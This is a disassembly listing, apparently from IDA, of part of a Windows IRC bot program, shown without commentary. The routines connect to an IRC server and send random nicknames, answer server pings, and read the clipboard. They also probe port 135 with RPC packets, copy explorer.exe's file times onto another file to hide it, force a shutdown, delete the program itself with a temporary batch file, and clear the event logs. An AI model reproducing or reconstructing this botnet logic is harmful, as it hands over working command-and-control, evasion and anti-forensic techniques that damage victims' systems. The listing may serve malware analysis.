call __ftol2
mov cl, 41h
loc_41A60B: ; CODE XREF: sub_41A293+359�j
sub cl, al
mov [ebp+esi+Dst], cl
inc esi
mov [ebp+var_4], esi
loc_41A615: ; CODE XREF: sub_41A293+305�j
; sub_41A293+35E�j
cmp [ebp+var_C], 2
jge short loc_41A695
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fimul [ebp+var_4]
fmul ds:dbl_437AF0
call __ftol2
cmp eax, 1
jnz short loc_41A695
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AC0
call __ftol2
mov cl, 30h
sub cl, al
mov [ebp+esi+Dst], cl
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AB8
call __ftol2
cmp eax, 1
jnz short loc_41A695
cmp [ebp+var_C], eax
jge short loc_41A695
call _rand
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437AB0
call __ftol2
mov cl, 30h
sub cl, al
mov [ebp+esi+var_27], cl
loc_41A695: ; CODE XREF: sub_41A293+1B8�j
; sub_41A293+386�j ...
push 14h ; Count
lea eax, [ebp+Dst]
push eax ; Source
push [ebp+Dest] ; Dest
call _strncpy
mov eax, [ebp+Dest]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_41A293 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A6AE(char *Str,int)
sub_41A6AE proc near ; CODE XREF: sub_41A7A3+135�p
Dst = byte ptr -420h
Dest = byte ptr -220h
Str2 = dword ptr -20h
var_1C = dword ptr -1Ch
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
push edi
mov esi, offset asc_42FE58 ; " "
push esi ; Delim
push [ebp+Str] ; Str
call _strtok
xor edi, edi
pop ecx
inc edi
pop ecx
mov [ebp+Str2], eax
xor ebx, ebx
loc_41A6D2: ; CODE XREF: sub_41A6AE+35�j
push esi ; Delim
push ebx ; Str
call _strtok
mov [ebp+edi*4+Str2], eax
inc edi
cmp edi, 8
pop ecx
pop ecx
jl short loc_41A6D2
cmp [ebp+Str2], ebx
mov esi, [ebp+var_1C]
jnz short loc_41A6F9
cmp esi, ebx
jnz short loc_41A6F9
xor eax, eax
inc eax
jmp loc_41A79E
; ---------------------------------------------------------------------------
loc_41A6F9: ; CODE XREF: sub_41A6AE+3D�j
; sub_41A6AE+41�j
push [ebp+Str2] ; Str2
push offset Str1 ; "PING"
call _strcmp
test eax, eax
pop ecx
pop ecx
push esi
jnz short loc_41A723
lea eax, [ebp+Dest]
push offset aPongS_0 ; "PONG %s\n"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_41A77D
; ---------------------------------------------------------------------------
loc_41A723: ; CODE XREF: sub_41A6AE+5D�j
push offset a433 ; "433"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz short loc_41A744
push esi ; Str2
push offset a432 ; "432"
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_41A79C
loc_41A744: ; CODE XREF: sub_41A6AE+83�j
push 200h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Dst]
push eax ; Dest
call sub_41A293
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push offset aNickS_1 ; "NICK %s\n"
push eax ; Dest
call _sprintf
add esp, 1Ch
loc_41A77D: ; CODE XREF: sub_41A6AE+73�j
lea eax, [ebp+Dest]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
loc_41A79C: ; CODE XREF: sub_41A6AE+94�j
xor eax, eax
loc_41A79E: ; CODE XREF: sub_41A6AE+46�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A6AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A7A3 proc near ; DATA XREF: sub_41A954+57�o
Dest = byte ptr -4008h
var_3008 = byte ptr -3008h
Dst = byte ptr -2008h
Str = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call __alloca_probe
push ebx
push esi
mov esi, [ebp+arg_0]
imul esi, 210h
push edi
push dword_4DB794[esi]
xor edi, edi
lea eax, dword_4DB594[esi]
inc edi
push eax
mov dword_4DB588[esi], edi
call sub_41A1C6
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov dword_4DB58C[esi], eax
jb loc_41A934
mov edi, 1000h
push edi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Dst]
push eax ; Dest
call sub_41A293
lea eax, [ebp+Dest]
push eax ; Dest
call sub_41A293
lea eax, [ebp+var_3008]
push eax ; Dest
call sub_41A293
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Str]
push offset aNickSUserSHotm ; "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
push eax ; Dest
call _sprintf
add esp, 2Ch
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push dword_4DB58C[esi]
call dword_4441A0 ; send
push edi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
push edi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 18h
jmp loc_41A914
; ---------------------------------------------------------------------------
loc_41A88F: ; CODE XREF: sub_41A7A3+18B�j
xor eax, eax
cmp [ebp+var_4], ebx
jmp short loc_41A8FE
; ---------------------------------------------------------------------------
loc_41A896: ; CODE XREF: sub_41A7A3+15E�j
mov al, [ebp+eax+Str]
cmp al, 0Dh
jz short loc_41A8BD
cmp al, 0Ah
jz short loc_41A8BD
cmp [ebp+arg_0], 0FA0h
jz short loc_41A8BD
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+Dst], al
jmp short loc_41A8F7
; ---------------------------------------------------------------------------
loc_41A8BD: ; CODE XREF: sub_41A7A3+FC�j
; sub_41A7A3+100�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_41A8F7
push dword_4DB58C[esi] ; int
mov [ebp+eax+Dst], bl
lea eax, [ebp+Dst]
push eax ; Str
call sub_41A6AE
test eax, eax
pop ecx
pop ecx
ja short loc_41A934
push edi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_41A8F7: ; CODE XREF: sub_41A7A3+118�j
; sub_41A7A3+11F�j
mov eax, [ebp+var_8]
inc eax
cmp eax, [ebp+var_4]
loc_41A8FE: ; CODE XREF: sub_41A7A3+F1�j
mov [ebp+var_8], eax
jnz short loc_41A896
push edi ; Size
lea eax, [ebp+Str]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_41A914: ; CODE XREF: sub_41A7A3+E7�j
push ebx
push edi
lea eax, [ebp+Str]
push eax
push dword_4DB58C[esi]
call dword_444064 ; recv
cmp eax, ebx
mov [ebp+var_4], eax
jg loc_41A88F
loc_41A934: ; CODE XREF: sub_41A7A3+40�j
; sub_41A7A3+13E�j
mov dword_4DB588[esi], ebx
mov esi, dword_4DB58C[esi]
cmp esi, ebx
jbe short loc_41A94B
push esi
call dword_444218 ; closesocket
loc_41A94B: ; CODE XREF: sub_41A7A3+19F�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_41A7A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A954(char *Source,int,int)
sub_41A954 proc near ; CODE XREF: sub_40274D+2FC0�p
var_8 = byte ptr -8
var_4 = dword ptr -4
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
mov [ebp+var_4], ebx
jle short loc_41A9CF
push esi
push edi
loc_41A966: ; CODE XREF: sub_41A954+77�j
xor edi, edi
mov eax, offset dword_4DB588
loc_41A96D: ; CODE XREF: sub_41A954+28�j
cmp [eax], ebx
jz short loc_41A97E
add eax, 210h
inc edi
cmp eax, offset byte_4E1CA8
jl short loc_41A96D
loc_41A97E: ; CODE XREF: sub_41A954+1B�j
cmp edi, 31h
jz short loc_41A9CD
push [ebp+Source] ; Source
mov esi, edi
imul esi, 210h
lea eax, dword_4DB594[esi]
push eax ; Dest
call _strcpy
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov dword_4DB794[esi], eax
lea eax, [ebp+var_8]
push eax
push ebx
push edi
push offset sub_41A7A3
push ebx
push ebx
mov dword_4DB588[esi], 1
call ds:dword_42B03C ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_41A966
loc_41A9CD: ; CODE XREF: sub_41A954+2D�j
pop edi
pop esi
loc_41A9CF: ; CODE XREF: sub_41A954+E�j
pop ebx
leave
retn
sub_41A954 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A9D2(int,int,void *Buf2,size_t Size)
sub_41A9D2 proc near ; CODE XREF: sub_41AA0A+127�p
; sub_41AA0A+14E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Buf2 = dword ptr 10h
Size = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
sub edi, [ebp+Size]
xor esi, esi
test edi, edi
jle short loc_41AA00
loc_41A9E3: ; CODE XREF: sub_41A9D2+2C�j
push [ebp+Size] ; Size
mov eax, [ebp+arg_0]
push [ebp+Buf2] ; Buf2
add eax, esi
push eax ; Buf1
call _memcmp
add esp, 0Ch
test eax, eax
jz short loc_41AA06
inc esi
cmp esi, edi
jl short loc_41A9E3
loc_41AA00: ; CODE XREF: sub_41A9D2+F�j
xor al, al
loc_41AA02: ; CODE XREF: sub_41A9D2+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41AA06: ; CODE XREF: sub_41A9D2+27�j
mov al, 1
jmp short loc_41AA02
sub_41A9D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA0A proc near ; CODE XREF: .text:0040CCCF�p
; .text:0040CDBB�p ...
var_2010 = dword ptr -2010h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call __alloca_probe
mov eax, [ebp+arg_4]
dec eax
jz short loc_41AA47
dec eax
jz short loc_41AA25
dec eax
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41AA25: ; CODE XREF: sub_41AA0A+14�j
push 3
push 1388h
push [ebp+arg_0]
call dword_44417C ; inet_addr
push eax
call sub_40BC56
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
leave
retn
; ---------------------------------------------------------------------------
loc_41AA47: ; CODE XREF: sub_41AA0A+11�j
push esi
push edi
push 6
push 1
push 2
call dword_444100 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz loc_41AB77
push ebx
push 10h ; Size
xor ebx, ebx
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push 87h
mov [ebp+Dst], 2
call dword_444260 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4022BD
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+Dst]
push eax
push esi
call dword_4440AC ; connect
cmp eax, edi
jz loc_41AB69
push ebx
push 48h
push offset dword_443368
push esi
call dword_4441A0 ; send
cmp eax, edi
jz loc_41AB69
push ebx
mov esi, 2000h
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_444064 ; recv
cmp eax, edi
jz loc_41AB69
cmp byte ptr [ebp+var_2010+2], 0Ch
jnz short loc_41AB69
push ebx
push 18h
push offset dword_4433B4
push [ebp+arg_4]
call dword_4441A0 ; send
cmp eax, edi
jz short loc_41AB69
push ebx
push esi
lea eax, [ebp+var_2010]
push eax
push [ebp+arg_4]
call dword_444064 ; recv
mov esi, eax
cmp esi, edi
jz short loc_41AB69
cmp byte ptr [ebp+var_2010+2], 2
jnz short loc_41AB69
push 10h ; Size
push offset dword_4433D0 ; Buf2
lea eax, [ebp+var_2010]
push esi ; int
push eax ; int
call sub_41A9D2
add esp, 10h
test al, al
jz short loc_41AB49
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_41AB69
; ---------------------------------------------------------------------------
loc_41AB49: ; CODE XREF: sub_41AA0A+131�j
push 10h ; Size
push offset dword_4433E4 ; Buf2
lea eax, [ebp+var_2010]
push esi ; int
push eax ; int
call sub_41A9D2
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_41AB69: ; CODE XREF: sub_41AA0A+9D�j
; sub_41AA0A+B4�j ...
push [ebp+arg_4]
call dword_444218 ; closesocket
mov eax, ebx
pop ebx
jmp short loc_41AB79
; ---------------------------------------------------------------------------
loc_41AB77: ; CODE XREF: sub_41AA0A+55�j
xor eax, eax
loc_41AB79: ; CODE XREF: sub_41AA0A+16B�j
pop edi
pop esi
leave
retn
sub_41AA0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41AB7D(char *Dest,char *SubStr,char *Source)
sub_41AB7D proc near ; CODE XREF: sub_40274D+AEE�p
; sub_40274D+B19�p ...
Dest = dword ptr 8
SubStr = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Dest]
xor esi, esi
cmp edi, esi
jz short loc_41AC08
mov eax, [ebp+SubStr]
cmp eax, esi
jz short loc_41AC08
cmp [ebp+Source], esi
jz short loc_41AC08
cmp byte ptr [eax], 0
jz short loc_41AC08
push ebx
push edi ; char *
call __strdup
mov ebx, eax
test ebx, ebx
pop ecx
jz short loc_41AC03
push [ebp+SubStr] ; SubStr
push edi ; Str
call _strstr
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_41ABFC
sub eax, edi
push eax ; Count
push edi ; Source
push ebx ; Dest
call _strncpy
push [ebp+Source] ; Str
mov eax, ebx
sub eax, edi
mov byte ptr [eax+esi], 0
call _strlen
push eax ; Count
push [ebp+Source] ; Source
push ebx ; Dest
call _strncat
push [ebp+SubStr] ; Str
call _strlen
add eax, esi
push eax ; Source
push ebx ; Dest
call _strcat
push ebx ; Source
push edi ; Dest
call _strcpy
add esp, 30h
mov esi, edi
loc_41ABFC: ; CODE XREF: sub_41AB7D+3C�j
push ebx ; Memory
call _free
pop ecx
loc_41AC03: ; CODE XREF: sub_41AB7D+2B�j
mov eax, esi
pop ebx
jmp short loc_41AC0A
; ---------------------------------------------------------------------------
loc_41AC08: ; CODE XREF: sub_41AB7D+C�j
; sub_41AB7D+13�j ...
xor eax, eax
loc_41AC0A: ; CODE XREF: sub_41AB7D+89�j
pop edi
pop esi
pop ebp
retn
sub_41AB7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41AC0E(char *Str,int)
sub_41AC0E proc near ; CODE XREF: sub_402472+C2�p
; sub_41321D+F4�p
Dst = dword ptr -7D0h
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
push 7D0h ; Size
xor ebx, ebx
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
mov esi, [ebp+Str]
push esi ; Str
call _strlen
xor edi, edi
inc edi
add esp, 10h
cmp eax, edi
jge short loc_41AC46
or eax, 0FFFFFFFFh
jmp short loc_41ACAD
; ---------------------------------------------------------------------------
loc_41AC46: ; CODE XREF: sub_41AC0E+31�j
xor ecx, ecx
cmp eax, ebx
mov [ebp+Dst], esi
jle short loc_41AC67
loc_41AC52: ; CODE XREF: sub_41AC0E+57�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_41AC5F
cmp dl, 0Dh
jnz short loc_41AC62
loc_41AC5F: ; CODE XREF: sub_41AC0E+4A�j
mov [ecx+esi], bl
loc_41AC62: ; CODE XREF: sub_41AC0E+4F�j
inc ecx
cmp ecx, eax
jl short loc_41AC52
loc_41AC67: ; CODE XREF: sub_41AC0E+42�j
xor edx, edx
cmp eax, ebx
jle short loc_41AC8F
loc_41AC6D: ; CODE XREF: sub_41AC0E+7F�j
cmp [edx+esi], bl
jnz short loc_41AC8A
lea ecx, [edx+esi+1]
cmp [ecx], bl
jz short loc_41AC8A
cmp edi, 1F4h
jge short loc_41AC8F
mov [ebp+edi*4+Dst], ecx
inc edi
loc_41AC8A: ; CODE XREF: sub_41AC0E+62�j
; sub_41AC0E+6A�j
inc edx
cmp edx, eax
jl short loc_41AC6D
loc_41AC8F: ; CODE XREF: sub_41AC0E+5D�j
; sub_41AC0E+72�j
cmp [ebp+arg_4], ebx
jz short loc_41ACAB
push 7D0h ; Size
lea eax, [ebp+Dst]
push eax ; Src
push [ebp+arg_4] ; Dst
call _memcpy
add esp, 0Ch
loc_41ACAB: ; CODE XREF: sub_41AC0E+84�j
mov eax, edi
loc_41ACAD: ; CODE XREF: sub_41AC0E+36�j
pop edi
pop esi
pop ebx
leave
retn
sub_41AC0E endp
; =============== S U B R O U T I N E =======================================
sub_41ACB2 proc near ; CODE XREF: sub_41B362+26�p
; sub_41B39F+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax ; C
call _tolower ; _tolower
cmp al, 61h
pop ecx
jl short loc_41ACCD
cmp al, 7Ah
jg short loc_41ACCD
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_41ACCD: ; CODE XREF: sub_41ACB2+E�j
; sub_41ACB2+12�j
xor eax, eax
retn
sub_41ACB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ACD0 proc near ; CODE XREF: sub_40274D+64B5�p
; sub_40274D+74AC�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_42B01C ; RtlGetLastWin32Error
push 0
push 100h
mov esi, eax
lea eax, [ebp+var_100]
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_42B100 ; FormatMessageA
lea eax, [ebp+var_100]
loc_41AD09: ; CODE XREF: sub_41ACD0+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_41AD15
cmp cl, 9
jnz short loc_41AD18
loc_41AD15: ; CODE XREF: sub_41ACD0+3E�j
inc eax
jmp short loc_41AD09
; ---------------------------------------------------------------------------
loc_41AD18: ; CODE XREF: sub_41ACD0+43�j
; sub_41ACD0+5B�j ...
mov byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_41AD32
mov cl, [eax]
cmp cl, 2Eh
jz short loc_41AD18
cmp cl, 21h
jl short loc_41AD18
loc_41AD32: ; CODE XREF: sub_41ACD0+54�j
push esi
lea eax, [ebp+var_100]
push eax
push [ebp+arg_0]
mov esi, offset byte_4E1CA8
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h ; Count
push esi ; Dest
call __snprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_41ACD0 endp
; =============== S U B R O U T I N E =======================================
sub_41AD5A proc near ; CODE XREF: sub_40274D+22AF�p
push esi
push 0
call dword_44409C ; OpenClipboard
test eax, eax
jz short loc_41AD91
push 1
call dword_44423C ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_41AD91
push edi
push esi
call ds:dword_42B108 ; GlobalLock
push esi
mov edi, eax
call ds:dword_42B104 ; GlobalUnlock
call dword_444080 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41AD91: ; CODE XREF: sub_41AD5A+B�j
; sub_41AD5A+19�j
xor eax, eax
pop esi
retn
sub_41AD5A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41AD95(char *Format)
sub_41AD95 proc near ; CODE XREF: sub_40274D+725F�p
Format = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
push esi
mov edi, offset aMirc_0 ; "mIRC"
push edi
call dword_444160 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_41AE11
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_42B114 ; CreateFileMappingA
push esi
push esi
push esi
mov edi, eax
push 0F001Fh
push edi
call ds:dword_42B110 ; MapViewOfFile
push [esp+10h+Format] ; Format
mov ebx, eax
push ebx ; Dest
call _sprintf
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_4441CC ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_4441CC ; SendMessageA
push ebx
call ds:dword_42B10C ; UnmapViewOfFile
push edi
call ds:dword_42B004 ; CloseHandle
xor eax, eax
inc eax
pop ebx
jmp short loc_41AE13
; ---------------------------------------------------------------------------
loc_41AE11: ; CODE XREF: sub_41AD95+16�j
xor eax, eax
loc_41AE13: ; CODE XREF: sub_41AD95+7A�j
pop edi
pop esi
pop ebp
retn
sub_41AD95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AE17 proc near ; CODE XREF: WinMain(x,x,x,x)+1FC�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_444124 ; SearchPathA
test eax, eax
jz short loc_41AEB8
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, ds:dword_42B08C
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_41AEB6
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_42B11C ; GetFileTime
push ebx
mov ebx, ds:dword_42B004
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41AEB6
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_42B118 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_41AEB6: ; CODE XREF: sub_41AE17+51�j
; sub_41AE17+87�j
pop edi
pop ebx
loc_41AEB8: ; CODE XREF: sub_41AE17+28�j
pop esi
leave
retn
sub_41AE17 endp
; =============== S U B R O U T I N E =======================================
sub_41AEBB proc near ; CODE XREF: sub_40274D+14E0�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_41C3D9
pop ecx
pop ecx
push 50005h
push 6
call dword_4441A4 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_41AEBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AEDD proc near ; CODE XREF: sub_40274D+254D�p
; sub_418F38+470�p
Str = byte ptr -764h
var_364 = byte ptr -364h
Dest = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
Dst = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_43C088, esi
push edi
jz short loc_41AF01
cmp dword_444274, esi
jnz short loc_41AF01
push esi ; Str
call sub_401000
pop ecx
loc_41AF01: ; CODE XREF: sub_41AEDD+13�j
; sub_41AEDD+1B�j
call sub_40AFF6
lea eax, [ebp+Str]
push eax
push 400h
call ds:dword_42B030 ; GetTempPathA
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset aSdel_bat ; "%sdel.bat"
push eax ; Dest
call _sprintf
add esp, 0Ch
push esi
push esi
push 2
push esi
push esi
push 40000000h
lea eax, [ebp+Dest]
push eax
call ds:dword_42B08C ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_41B061
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax ; Dest
call _sprintf
add esp, 0Ch
push esi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push edi
call ds:dword_42B084 ; WriteFile
push edi
call ds:dword_42B004 ; CloseHandle
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
pop edi
push edi ; Size
lea eax, [ebp+var_58]
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
push edi
lea eax, [ebp+var_15C]
push eax
push esi
mov [ebp+var_4C], offset byte_42B633
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:dword_42B024 ; GetModuleHandleA
push eax
call ds:dword_42B00C ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_42B050 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_41B009
push 80h
lea eax, [ebp+var_15C]
push eax
call ds:dword_42B04C ; SetFileAttributesA
loc_41B009: ; CODE XREF: sub_41AEDD+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax ; Dest
call _sprintf
add esp, 10h
push edi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+Str]
push eax
call ds:dword_42B120 ; ExpandEnvironmentStringsA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
push esi
lea eax, [ebp+var_364]
push eax
push esi
call ds:dword_42B008 ; CreateProcessA
loc_41B061: ; CODE XREF: sub_41AEDD+72�j
pop edi
pop esi
leave
retn
sub_41AEDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B065(int,char *Str,int,int,int)
sub_41B065 proc near ; CODE XREF: sub_40274D+6E5F�p
Dest = byte ptr -294h
Dst = dword ptr -94h
var_84 = dword ptr -84h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 294h
push edi
push 94h ; Size
xor edi, edi
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
mov [ebp+Dst], 94h
call ds:dword_42B064 ; GetVersionExA
cmp [ebp+var_84], 2
jnz short loc_41B0FB
push [ebp+arg_10]
push [ebp+arg_C]
call dword_444248 ; OpenEventLogA
push edi
push eax
call dword_44411C ; ClearEventLogA
test eax, eax
jz short loc_41B0ED
push [ebp+arg_10]
push offset asc_437C50 ; "-"
loc_41B0C6: ; CODE XREF: sub_41B065+94�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
push edi ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
jmp short loc_41B125
; ---------------------------------------------------------------------------
loc_41B0ED: ; CODE XREF: sub_41B065+57�j
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_437C28
jmp short loc_41B0C6
; ---------------------------------------------------------------------------
loc_41B0FB: ; CODE XREF: sub_41B065+3F�j
lea eax, [ebp+Dest]
push offset asc_437BF8 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 1Ch
loc_41B125: ; CODE XREF: sub_41B065+86�j
pop edi
leave
retn
sub_41B065 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B128 proc near ; CODE XREF: .text:0040CEF6�p
; sub_40D7FE+434�p ...
var_5A4 = byte ptr -5A4h
Dest = byte ptr -1A4h
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A4h
push esi
push edi
push 10h ; Size
xor edi, edi
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_4]
push eax
mov [ebp+Dst], 2
call dword_44417C ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_10], eax
call dword_444260 ; htons
push edi
push 1
push 2
mov [ebp+var_12], ax
call dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jz short loc_41B18E
push 10h
lea eax, [ebp+Dst]
push eax
push esi
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_41B195
loc_41B18E: ; CODE XREF: sub_41B128+52�j
xor al, al
jmp loc_41B247
; ---------------------------------------------------------------------------
